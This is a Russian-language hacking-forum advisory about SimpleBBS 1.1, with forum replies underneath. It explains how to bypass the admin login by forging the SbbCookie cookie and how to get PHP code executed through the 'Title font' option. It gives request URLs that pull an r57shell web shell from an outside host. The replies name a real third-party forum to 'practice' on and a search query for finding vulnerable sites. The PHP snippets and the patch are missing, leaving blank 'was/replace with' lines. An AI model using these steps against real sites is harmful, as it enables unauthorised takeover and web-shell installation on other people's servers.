SimpleBBS 1.1 PHP code execution
 

Продукт: SimpleBBS 1.1
Уязвимость: Выполнение произвольного PHP-кода
Опасность: Критическая

Описание
Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS.
В параметре "Title font" в панели администратора можно ввести php-код в виде:
который будет выполнен при прямом обращении к скрипту data/options.php
Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей.
Для получения шелла потребуется код:
Обращаться - data/options.php?c=http://www.site.com/r57shell.txt
или
Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php.

Защита
Предлагается фильтровать параметр ylarivifont следующим кодом.
includes/adminjee3.php
Было:
Заменить на:
Author: Great

Гугл выдал - SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to ...
если есть пароль к админке на бюлетене, это будет работать? или может, ЭТО, другие вкусности на бюлетене позволяет?

С НОВЫМ 2007! =)

Пароль к админке не нужен. Я описал две баги - вход в админку без пароля и выполнение в админке произвольного кода.
если есть пасс, первая бага не нужна. сразу заходи в админку

del

Вот тут мона потренировацца
http://asukkaat.hoas.fi/tukkitie/forum/index.php

_http://www.google.ru/search?q=%22Powered+by+SimpleBBS+v1.1%22

зашел на офф сайт
.....